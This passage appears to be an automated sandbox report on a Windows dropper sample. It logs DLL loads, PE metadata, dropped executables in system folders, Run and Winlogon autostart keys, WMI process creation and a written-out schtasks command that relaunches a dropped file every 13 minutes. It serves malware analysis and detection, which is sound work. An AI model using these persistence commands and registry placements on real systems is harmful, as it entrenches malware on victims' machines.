                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: profapi.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: cryptsp.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: rsaenh.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: cryptbase.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: sspicli.dll
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: mscoree.dll
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: apphelp.dll
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: version.dll
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: windows.storage.dll
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: wldp.dll
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: profapi.dll
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: cryptsp.dll
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: cryptbase.dll
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: mscoree.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: version.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: windows.storage.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: wldp.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: profapi.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: cryptsp.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: cryptbase.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: sspicli.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: mscoree.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: kernel.appcore.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: version.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: uxtheme.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: windows.storage.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: wldp.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: profapi.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: cryptsp.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: rsaenh.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: cryptbase.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: mscoree.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: version.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: windows.storage.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: wldp.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: profapi.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: cryptsp.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: cryptbase.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                    Source: 7aHY4r6vXR.exeStatic file information: File size 14707581 > 1048576
                                    Source: 7aHY4r6vXR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: 7aHY4r6vXR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: 7aHY4r6vXR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: 7aHY4r6vXR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: 7aHY4r6vXR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: 7aHY4r6vXR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: 7aHY4r6vXR.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: 7aHY4r6vXR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 7aHY4r6vXR.exe
                                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.pdb source: bridgeServerFontSavesMonitor.exe, 00000004.00000002.1849804431.000000000393F000.00000004.00000800.00020000.00000000.sdmp
                                    Source: 7aHY4r6vXR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: 7aHY4r6vXR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: 7aHY4r6vXR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: 7aHY4r6vXR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: 7aHY4r6vXR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.cmdline"
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.cmdline"Jump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeFile created: C:\ChainBroker\__tmp_rar_sfx_access_check_5981078Jump to behavior
                                    Source: 7aHY4r6vXR.exeStatic PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BEF640 push ecx; ret 0_2_00BEF653
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BEEB78 push eax; ret 0_2_00BEEB96
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeCode function: 4_2_00007FFD9BAD4B3C push ebp; retf 4_2_00007FFD9BAD4B42
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeCode function: 4_2_00007FFD9BEC86CE push es; ret 4_2_00007FFD9BEC86CF
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeCode function: 4_2_00007FFD9BEC54EC push cs; iretd 4_2_00007FFD9BEC561F
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeCode function: 29_2_00007FFD9BAB4B3C push ebp; retf 29_2_00007FFD9BAB4B42
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeCode function: 32_2_00007FFD9BAA4B3C push ebp; retf 32_2_00007FFD9BAA4B42
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeCode function: 35_2_00007FFD9BAD4AC2 push E812C57Eh; retf 35_2_00007FFD9BAD4AC9
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeCode function: 35_2_00007FFD9BAD7560 push ebx; iretd 35_2_00007FFD9BAD756A
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeCode function: 35_2_00007FFD9BAD7550 push ebx; iretd 35_2_00007FFD9BAD756A
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeCode function: 35_2_00007FFD9BAB896D push ecx; iretd 35_2_00007FFD9BAB896E
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeCode function: 35_2_00007FFD9BAB955F push esp; ret 35_2_00007FFD9BAB956B
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeCode function: 35_2_00007FFD9BAA4B3C push ebp; retf 35_2_00007FFD9BAA4B42
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeCode function: 36_2_00007FFD9BAD896D push ecx; iretd 36_2_00007FFD9BAD896E
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeCode function: 36_2_00007FFD9BAD955F push esp; ret 36_2_00007FFD9BAD956B
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeCode function: 36_2_00007FFD9BAC4B3C push ebp; retf 36_2_00007FFD9BAC4B42
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeCode function: 36_2_00007FFD9BAF4AC2 push E8127A7Eh; retf 36_2_00007FFD9BAF4AC9
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeCode function: 36_2_00007FFD9BAF7560 push ebx; iretd 36_2_00007FFD9BAF756A
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeCode function: 36_2_00007FFD9BAF7550 push ebx; iretd 36_2_00007FFD9BAF756A
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeCode function: 38_2_00007FFD9BAC4B3C push ebp; retf 38_2_00007FFD9BAC4B42
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeCode function: 38_2_00007FFD9BAF4AC2 push E813227Eh; retf 38_2_00007FFD9BAF4AC9
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeCode function: 38_2_00007FFD9BAF7560 push ebx; iretd 38_2_00007FFD9BAF756A
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeCode function: 38_2_00007FFD9BAF7550 push ebx; iretd 38_2_00007FFD9BAF756A
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeCode function: 38_2_00007FFD9BAD9F43 push 8B48FFFFh; iretd 38_2_00007FFD9BAD9F4E
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeCode function: 38_2_00007FFD9BAD896D push ecx; iretd 38_2_00007FFD9BAD896E
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeCode function: 38_2_00007FFD9BAD955F push esp; ret 38_2_00007FFD9BAD956B
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeCode function: 41_2_00007FFD9BADF74A push es; ret 41_2_00007FFD9BADF74B
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeCode function: 41_2_00007FFD9BAB4B3C push ebp; retf 41_2_00007FFD9BAB4B42
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeCode function: 41_2_00007FFD9BAE4AC2 push E8138E7Eh; retf 41_2_00007FFD9BAE4AC9
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeCode function: 41_2_00007FFD9BAE7560 push ebx; iretd 41_2_00007FFD9BAE756A
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeCode function: 41_2_00007FFD9BAE7550 push ebx; iretd 41_2_00007FFD9BAE756A
                                    Source: bridgeServerFontSavesMonitor.exe.0.drStatic PE information: section name: .text entropy: 7.5410078719892475
                                    Source: SfLAFHFXIbHzHGgilQgXtKOw.exe.4.drStatic PE information: section name: .text entropy: 7.5410078719892475
                                    Source: SfLAFHFXIbHzHGgilQgXtKOw.exe0.4.drStatic PE information: section name: .text entropy: 7.5410078719892475
                                    Source: RuntimeBroker.exe.4.drStatic PE information: section name: .text entropy: 7.5410078719892475
                                    Source: SfLAFHFXIbHzHGgilQgXtKOw.exe1.4.drStatic PE information: section name: .text entropy: 7.5410078719892475
                                    Source: SfLAFHFXIbHzHGgilQgXtKOw.exe2.4.drStatic PE information: section name: .text entropy: 7.5410078719892475

                                    Persistence and Installation Behavior

                                    barindex
                                    Creates processes via WMI
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Infects executable files (exe, dll, sys, html)
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile created: C:\Windows\Migration\WTR\SfLAFHFXIbHzHGgilQgXtKOw.exeJump to dropped file
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile created: C:\Users\user\Desktop\VObntHLa.logJump to dropped file
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile created: C:\Users\user\Desktop\ARUSTYfT.logJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile created: C:\Users\user\Desktop\hzhmzTUD.logJump to dropped file
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile created: C:\Windows\SchCache\RuntimeBroker.exeJump to dropped file
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile created: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeJump to dropped file
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile created: C:\Users\user\Desktop\riACjval.logJump to dropped file
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeFile created: C:\ChainBroker\bridgeServerFontSavesMonitor.exeJump to dropped file
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile created: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeJump to dropped file
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile created: C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\SfLAFHFXIbHzHGgilQgXtKOw.exeJump to dropped file
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile created: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeJump to dropped file
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile created: C:\Windows\Migration\WTR\SfLAFHFXIbHzHGgilQgXtKOw.exeJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile created: C:\Windows\SchCache\RuntimeBroker.exeJump to dropped file
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile created: C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\SfLAFHFXIbHzHGgilQgXtKOw.exeJump to dropped file
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile created: C:\Users\user\Desktop\VObntHLa.logJump to dropped file
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile created: C:\Users\user\Desktop\ARUSTYfT.logJump to dropped file
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile created: C:\Users\user\Desktop\riACjval.logJump to dropped file
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile created: C:\Users\user\Desktop\hzhmzTUD.logJump to dropped file

                                    Boot Survival

                                    barindex
                                    Creates an autostart registry key pointing to binary in C:\Windows
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                                    Creates an undocumented autostart registry key
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Creates multiple autostart registry keys
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SfLAFHFXIbHzHGgilQgXtKOwJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bridgeServerFontSavesMonitorJump to behavior
                                    Drops PE files to the user root directory
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile created: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeJump to dropped file
                                    Uses schtasks.exe or at.exe to add and modify task schedules
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /f
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SfLAFHFXIbHzHGgilQgXtKOwJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SfLAFHFXIbHzHGgilQgXtKOwJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bridgeServerFontSavesMonitorJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bridgeServerFontSavesMonitorJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bridgeServerFontSavesMonitorJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bridgeServerFontSavesMonitorJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SfLAFHFXIbHzHGgilQgXtKOwJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SfLAFHFXIbHzHGgilQgXtKOwJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SfLAFHFXIbHzHGgilQgXtKOwJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SfLAFHFXIbHzHGgilQgXtKOwJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SfLAFHFXIbHzHGgilQgXtKOwJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SfLAFHFXIbHzHGgilQgXtKOwJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SfLAFHFXIbHzHGgilQgXtKOwJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SfLAFHFXIbHzHGgilQgXtKOwJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SfLAFHFXIbHzHGgilQgXtKOwJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SfLAFHFXIbHzHGgilQgXtKOwJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
